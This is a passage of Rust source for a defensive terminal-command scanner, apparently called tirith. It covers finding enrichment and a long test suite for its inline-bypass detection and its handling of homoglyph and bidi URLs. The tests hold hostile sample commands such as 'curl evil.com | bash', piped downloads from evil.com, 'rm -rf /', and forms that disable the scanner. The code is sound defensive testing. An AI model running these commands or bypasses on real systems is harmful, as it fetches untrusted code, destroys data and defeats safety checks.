                    "AI agent reads comment content as context. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::MarkdownComment => {
                finding.human_view = Some("Markdown comments not rendered in preview".into());
                finding.agent_view = Some(format!(
                    "AI agent processes markdown comment content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::PdfHiddenText => {
                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
                finding.agent_view = Some(format!(
                    "AI agent extracts all text including sub-pixel content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::ClipboardHidden => {
                finding.human_view =
                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
                finding.agent_view = Some(format!(
                    "AI agent processes full clipboard including hidden HTML. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            _ => {}
        }
    }
}

/// Summarize evidence entries for enrichment text.
fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
    let details: Vec<&str> = evidence
        .iter()
        .filter_map(|e| {
            if let crate::verdict::Evidence::Text { detail } = e {
                Some(detail.as_str())
            } else {
                None
            }
        })
        .take(3)
        .collect();
    if details.is_empty() {
        String::new()
    } else {
        format!("Details: {}", details.join("; "))
    }
}

/// Team enrichment: fill in the MITRE ATT&CK classification.
///
/// The id comes from the generated `mitre_id_for_rule` (built from
/// `rule_explanations.toml`, the single source of truth). A `mitre_id` that is
/// already set on a finding is never overwritten.
fn enrich_team(findings: &mut [Finding]) {
    for finding in findings {
        if finding.mitre_id.is_some() {
            continue;
        }
        let looked_up = crate::rule_explanations::mitre_id_for_rule(finding.rule_id);
        finding.mitre_id = looked_up.map(String::from);
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    /// Build an interactive POSIX `ScanContext::Exec` context for `input`,
    /// with every optional field left unset.
    fn exec_ctx(input: &str) -> AnalysisContext {
        AnalysisContext {
            input: input.to_string(),
            shell: ShellType::Posix,
            scan_context: ScanContext::Exec,
            raw_bytes: None,
            interactive: true,
            cwd: None,
            file_path: None,
            repo_root: None,
            is_config_override: false,
            clipboard_html: None,
        }
    }

    /// Build a synthetic finding carrying only a rule, a severity and a title.
    /// The paranoia filter looks at `severity` alone, so everything else is
    /// left empty.
    fn synthetic_finding(
        rule_id: crate::verdict::RuleId,
        severity: crate::verdict::Severity,
        title: &str,
    ) -> Finding {
        Finding {
            rule_id,
            severity,
            title: title.into(),
            description: String::new(),
            evidence: vec![],
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        }
    }

    /// All-zero timings for verdicts built from synthetic findings.
    fn zero_timings() -> Timings {
        Timings {
            tier0_ms: 0.0,
            tier1_ms: 0.0,
            tier2_ms: None,
            tier3_ms: None,
            total_ms: 0.0,
        }
    }

    #[test]
    fn test_exec_bidi_without_url() {
        // Bidi control alone (no URL) must reach tier 3; else the exec path
        // would fast-exit and miss the attack.
        let input = format!("echo hello{}world", '\u{202E}');
        let verdict = analyze(&exec_ctx(&input));
        assert!(
            verdict.tier_reached >= 3,
            "bidi in exec should reach tier 3, got tier {}",
            verdict.tier_reached
        );
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
            "should detect bidi controls in exec context"
        );
    }

    #[test]
    fn test_paranoia_filter_suppresses_info_low() {
        use crate::verdict::{RuleId, Severity};

        let findings = vec![
            // Synthetic Info finding; any rule_id works — we just need one
            // with Severity::Info for the filter to drop.
            synthetic_finding(RuleId::NonStandardPort, Severity::Info, "info finding"),
            synthetic_finding(RuleId::InvisibleWhitespace, Severity::Low, "low finding"),
            synthetic_finding(RuleId::HiddenCssContent, Severity::High, "high finding"),
        ];

        let mut verdict = Verdict::from_findings(findings.clone(), 3, zero_timings());
        filter_findings_by_paranoia(&mut verdict, 1);
        assert_eq!(
            verdict.findings.len(),
            1,
            "paranoia 1 should keep only Medium+"
        );
        assert_eq!(verdict.findings[0].severity, Severity::High);

        let mut verdict = Verdict::from_findings(findings.clone(), 3, zero_timings());
        filter_findings_by_paranoia(&mut verdict, 2);
        assert_eq!(
            verdict.findings.len(),
            1,
            "paranoia 2 should keep only Medium+"
        );
    }

    #[test]
    fn test_paranoia_filter_vec_levels() {
        use crate::verdict::{RuleId, Severity};

        // One finding each at Info, Low and High. The expected survivor count
        // per level follows the documented contract: 0-2 keep Medium+, 3 adds
        // Low, 4 adds Info, and anything above 4 behaves like 4.
        let all = vec![
            synthetic_finding(RuleId::NonStandardPort, Severity::Info, "info finding"),
            synthetic_finding(RuleId::InvisibleWhitespace, Severity::Low, "low finding"),
            synthetic_finding(RuleId::HiddenCssContent, Severity::High, "high finding"),
        ];

        for (paranoia, expected) in [(0u8, 1usize), (1, 1), (2, 1), (3, 2), (4, 3), (u8::MAX, 3)] {
            let mut findings = all.clone();
            filter_findings_by_paranoia_vec(&mut findings, paranoia);
            assert_eq!(
                findings.len(),
                expected,
                "paranoia {paranoia} should keep {expected} finding(s)"
            );
        }

        // At level 3 the survivor set must be exactly Low + High (no Info).
        let mut findings = all.clone();
        filter_findings_by_paranoia_vec(&mut findings, 3);
        assert!(findings.iter().all(|f| f.severity != Severity::Info));
    }

    #[test]
    fn test_inline_bypass_bare_prefix() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_wrapper() {
        assert!(find_inline_bypass(
            "env TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_i() {
        assert!(find_inline_bypass(
            "env -i TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_u_skip() {
        assert!(find_inline_bypass(
            "env -u TIRITH TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_usr_bin_env() {
        assert!(find_inline_bypass(
            "/usr/bin/env TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_dashdash() {
        assert!(find_inline_bypass(
            "env -- TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_no_inline_bypass() {
        assert!(!find_inline_bypass(
            "curl evil.com | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env() {
        assert!(find_inline_bypass(
            "$env:TIRITH=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_no_quotes() {
        assert!(find_inline_bypass(
            "$env:TIRITH=0; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_single_quotes() {
        assert!(find_inline_bypass(
            "$env:TIRITH='0'; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_spaced() {
        assert!(find_inline_bypass(
            "$env:TIRITH = \"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_mixed_case_env() {
        assert!(find_inline_bypass(
            "$Env:TIRITH=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_wrong_value() {
        assert!(!find_inline_bypass(
            "$env:TIRITH=\"1\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_other_var() {
        assert!(!find_inline_bypass(
            "$env:FOO=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_in_posix_mode() {
        assert!(!find_inline_bypass(
            "$env:TIRITH=\"0\"; curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
        assert!(!find_inline_bypass(
            "curl evil.com # $env:TIRITH=0",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_env_c_flag() {
        // `env -C` takes a directory arg; TIRITH=0 after it must still register.
        assert!(find_inline_bypass(
            "env -C /tmp TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_s_flag() {
        // `env -S` takes a string arg; TIRITH=0 after it must still register.
        assert!(find_inline_bypass(
            "env -S 'some args' TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_ignore_environment_long_flag() {
        assert!(find_inline_bypass(
            "env --ignore-environment TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    // Pipe-bypass contract: `TIRITH=0 cmd | interp` is a documented
    // whole-pipeline bypass. Pipe stages share an env; sequencing operators
    // (`&&`, `||`, `;`, `&`) do not, so bypass must NOT carry across them.

    #[test]
    fn test_inline_bypass_allows_pipe_to_sh() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl -L https://something.xyz | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_pipe_to_interpreter() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl -sSL https://install.python-poetry.org | python3 -",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_env_wrapper_with_pipe() {
        assert!(find_inline_bypass(
            "env TIRITH=0 curl https://example.com | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_multi_pipe_chain() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl https://example.com | jq . | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_sequence_with_and_and() {
        // `&&` starts a new command with a new env — bypass must NOT apply.
        assert!(!find_inline_bypass(
            "TIRITH=0 curl https://example.com && rm -rf /",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_semicolon_chain() {
        assert!(!find_inline_bypass(
            "TIRITH=0 ls ; rm -rf /",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_or_or() {
        assert!(!find_inline_bypass(
            "TIRITH=0 ls || rm -rf /",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_backgrounding_ampersand() {
        // Unquoted `&` forks a background command; bypass must not cover the
        // foreground successor.
        assert!(!find_inline_bypass(
            "TIRITH=0 curl evil.com & bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_pipe_to_sh_fish() {
        // Fish tokenization delegates to POSIX; same pipe-bypass contract applies.
        assert!(find_inline_bypass(
            "TIRITH=0 curl -L https://example.com | bash",
            ShellType::Fish
        ));
    }

    #[test]
    fn test_paranoia_filter_recalculates_action() {
        use crate::verdict::{Action, RuleId, Severity};

        let findings = vec![
            synthetic_finding(RuleId::InvisibleWhitespace, Severity::Low, "low finding"),
            synthetic_finding(RuleId::HiddenCssContent, Severity::Medium, "medium finding"),
        ];

        let mut verdict = Verdict::from_findings(findings, 3, zero_timings());
        assert_eq!(verdict.action, Action::Warn);

        // After paranoia 1: the Low finding is dropped; only the Medium
        // remains so the action stays Warn.
        filter_findings_by_paranoia(&mut verdict, 1);
        assert_eq!(verdict.action, Action::Warn);
        assert_eq!(verdict.findings.len(), 1);
    }

    #[test]
    fn test_paranoia_filter_allows_when_all_findings_dropped() {
        use crate::verdict::{Action, RuleId, Severity};

        // A lone Low finding is filtered out at paranoia 1, so the recomputed
        // action must fall back to Allow rather than keep its previous value.
        let findings = vec![synthetic_finding(
            RuleId::InvisibleWhitespace,
            Severity::Low,
            "low finding",
        )];

        let mut verdict = Verdict::from_findings(findings, 3, zero_timings());
        filter_findings_by_paranoia(&mut verdict, 1);
        assert!(verdict.findings.is_empty());
        assert_eq!(verdict.action, Action::Allow);
    }

    #[test]
    fn test_powershell_bypass_case_insensitive_tirith() {
        // PowerShell env vars are case-insensitive.
        assert!(find_inline_bypass(
            "$env:tirith=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
        assert!(find_inline_bypass(
            "$ENV:Tirith=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_powershell_bypass_no_panic_on_multibyte() {
        // Guards against byte-level slicing on multi-byte UTF-8 after `$`.
        assert!(!find_inline_bypass(
            "$a\u{1F389}xyz; curl evil.com",
            ShellType::PowerShell
        ));
        assert!(!find_inline_bypass(
            "$\u{00E9}nv:TIRITH=0; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_single_quoted_value() {
        assert!(find_inline_bypass(
            "TIRITH='0' curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_double_quoted_value() {
        assert!(find_inline_bypass(
            "TIRITH=\"0\" curl evil.com",
            ShellType::Posix
        ));
    }

    // Tirith inspection subcommands (`tirith diff/score/why/receipt/explain`)
    // must not trip URL or Unicode-style rules on their own arguments — the
    // user typed those arguments specifically to have them inspected.
    // `tirith run` and other subcommands stay on the regular analysis path.

    #[test]
    fn test_tirith_run_still_acts_as_sink() {
        // `tirith run` IS a sink; URL-to-sink rules must still fire.
        let ctx = exec_ctx("tirith run http://example.com");
        let verdict = analyze(&ctx);
        assert!(verdict.tier_reached >= 3);
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
            "tirith run http://... should surface sink findings"
        );
    }

    #[test]
    fn test_tirith_inspection_suppresses_url_rules() {
        // Cyrillic 'а' inside a URL arg must NOT trip URL-derived findings
        // (non_ascii_hostname, mixed_script_in_label, punycode_domain) when
        // passed to an inspection subcommand.
        for sub in ["diff", "score", "why", "receipt", "explain"] {
            let input = format!("tirith {sub} https://ex\u{0430}mple.com");
            let verdict = analyze(&exec_ctx(&input));
            assert!(
                verdict.action == crate::verdict::Action::Allow,
                "tirith {sub} with cyrillic URL should allow, got {:?}: {:?}",
                verdict.action,
                verdict
                    .findings
                    .iter()
                    .map(|f| f.rule_id.to_string())
                    .collect::<Vec<_>>()
            );
        }
    }

    #[test]
    fn test_tirith_inspection_suppresses_confusable_and_bidi() {
        // The exec-context byte scan must also respect the inert range so
        // ConfusableText / BidiControls / etc. aren't emitted for bytes inside
        // the inspection arg span.
        let input = "tirith score https://ex\u{0430}mple.com/\u{202E}bar";
        let verdict = analyze(&exec_ctx(input));
        for f in &verdict.findings {
            assert!(
                !matches!(
                    f.rule_id,
                    crate::verdict::RuleId::ConfusableText | crate::verdict::RuleId::BidiControls
                ),
                "tirith score arg span must not surface {:?}",
                f.rule_id
            );
        }
    }

    #[test]
    fn test_tirith_inspection_with_pipe_still_analyzes_rest() {
        // Later pipeline segments must still be analyzed normally.
        let ctx = exec_ctx("tirith diff foo | curl http://evil.com/x.sh | sh");
        let verdict = analyze(&ctx);
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
            "later pipe segments must still fire plain_http_to_sink"
        );
    }

    #[test]
    fn test_tirith_inspection_with_leading_flag() {
        // A flag before the subcommand must not defeat the carveout.
        let input = "tirith --quiet diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_doctor_not_on_inert_list() {
        // `doctor` is deliberately NOT on the inspection list. Adding any new
        // subcommand requires a motivating false-positive fixture.
        let input = "tirith doctor https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_ne!(
            verdict.action,
            crate::verdict::Action::Allow,
            "tirith doctor with cyrillic URL SHOULD still flag (not on inert list); \
             adding `doctor` to the list requires a motivating false-positive fixture"
        );
    }

    #[test]
    fn test_tirith_run_bidi_in_url_still_fires() {
        // `tirith run` is a sink (not on the inspection list); bidi in its URL
        // arg must still fire.
        let input = "tirith run https://evil\u{202E}.com/x.sh";
        let verdict = analyze(&exec_ctx(input));
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
            "bidi in `tirith run` URL must still fire"
        );
    }

    #[test]
    fn test_tirith_inert_arg_range_covers_expected_span() {
        let input = "tirith diff https://ex\u{0430}mple.com";
        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
        // "tirith diff" is 11 bytes; arg span starts at byte 11 and runs to end.
        assert_eq!(&input[range.clone()], " https://ex\u{0430}mple.com");
        assert_eq!(range.end, input.len());
    }

    #[test]
    fn test_tirith_inert_arg_range_none_for_run() {
        let range =
            extract::tirith_inert_arg_range("tirith run http://example.com", ShellType::Posix);
        assert!(range.is_none());
    }

    #[test]
    fn test_tirith_inert_arg_range_none_for_non_tirith() {
        assert!(
            extract::tirith_inert_arg_range("curl https://example.com", ShellType::Posix).is_none()
        );
    }

    #[test]
    fn test_tirith_inert_arg_range_pipe_only_first_segment() {
        // Only the first segment is inert; later pipe stages must still analyze.
        let input = "tirith diff foo | curl http://evil.com";
        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
        assert!(range.end < input.len());
        assert!(!input[range].contains("curl"));
    }

    #[test]
    fn test_tirith_inspection_suppresses_unicode_tags_evidence_text() {
        // UnicodeTags emits Evidence::Text (no byte offset), so an offset-only
        // post-filter would leak it. The inert range must therefore be applied
        // AT SCAN TIME (inside check_bytes_with_ignore).
        let input = "tirith diff https://example.com/\u{E0041}";
        let verdict = analyze(&exec_ctx(input));
        assert!(
            !verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
            "UnicodeTags inside tirith diff arg must be suppressed, got findings: {:?}",
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_unicode_tags_outside_still_fires() {
        // A unicode-tag byte before `tirith diff` is outside the inert range
        // and must still fire.
        let input = "FOO=\u{E0041}\u{E0042} tirith diff safe";
        let verdict = analyze(&exec_ctx(input));
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
            "UnicodeTags before tirith diff must still fire, got findings: {:?}",
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_wrapper() {
        // `sudo tirith diff URL` — the resolver must see through the sudo
        // wrapper to recognize the inspection subcommand.
        let input = "sudo tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(
            verdict.action,
            crate::verdict::Action::Allow,
            "sudo tirith diff <cyrillic-url> must be allowed, got {:?}: {:?}",
            verdict.action,
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_u_flag() {
        // `sudo -u root` — -u takes a value; the resolver must skip past it.
        let input = "sudo -u root tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inspection_env_assignment_url_still_analyzed() {
        // A URL in a leading `FOO=URL` env assignment is OUTSIDE the inspection
        // arg span and must still be analyzed.
        let input = "FOO=http://evil.com tirith diff safe";
        let verdict = analyze(&exec_ctx(input));
        // Exact rule behavior for schemeless URLs belongs in the rules layer;
        // this test just checks the URL reached the extractor at all.
        let urls = verdict.urls_extracted_count.unwrap_or(0);
        assert!(
            !verdict.findings.is_empty() || urls > 0,
            "env-assignment URL must still be extracted/analyzed, got {:?}",
            verdict
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_dash_s_boolean_flag() {
        // `-S` is a BOOLEAN sudo flag (read password from stdin). Treating it
        // as value-taking would skip `tirith` and resolve `diff` as the
        // command word, breaking the carveout.
        let input = "sudo -S tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(
            verdict.action,
            crate::verdict::Action::Allow,
            "sudo -S tirith diff must still allow; got {:?}: {:?}",
            verdict.action,
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_dash_a_boolean_flag() {
        // Same boolean-flag class as `-S`, for `-A` (askpass).
        let input = "sudo -A tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inspection_with_sudo_dash_b_boolean_flag() {
        // Same boolean-flag class as `-S`, for `-B` (ring bell).
        let input = "sudo -B tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inspection_with_doas_wrapper() {
        // `doas` is an OpenBSD-flavored sudo alias; same resolver branch.
        let input = "doas tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inert_arg_range_no_false_match_inside_flag_value() {
        // A naive substring search would match "diff" inside `--config=diff`.
        // The subcommand lookup must require a whitespace word boundary.
        let input = "tirith --config=diff diff https://example.com";
        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
        let inert_slice = &input[range];
        assert!(
            inert_slice.contains("https://example.com"),
            "inert range should cover the URL, got: {inert_slice:?}"
        );
        // If the lookup had matched the `diff` inside the flag value, the span
        // would begin right after it and still contain the real subcommand.
        // Checking for any `diff` catches that case as well as a span that
        // begins before the flag.
        assert!(
            !inert_slice.contains("diff"),
            "inert range should not start inside the flag value: {inert_slice:?}"
        );
    }

    #[test]
    fn test_cmd_bypass_bare_set() {
        assert!(find_inline_bypass(
            "set TIRITH=0 & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_bypass_whole_token_quoted() {
        // Whole-token quoting IS a real bypass — the quotes surround the whole
        // `TIRITH=0` assignment.
        assert!(find_inline_bypass(
            "set \"TIRITH=0\" & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_inner_double_quotes() {
        // cmd.exe stores literal `"0"` (quotes included), so `set TIRITH="0"`
        // does NOT bypass.
        assert!(!find_inline_bypass(
            "set TIRITH=\"0\" & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_single_quotes() {
        // Single quotes are literal in cmd.exe (not syntax), so the value is
        // `'0'`, not `0`.
        assert!(!find_inline_bypass(
            "set TIRITH='0' & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_wrong_value() {
        assert!(!find_inline_bypass(
            "set TIRITH=1 & curl evil.com",
            ShellType::Cmd
        ));
    }
}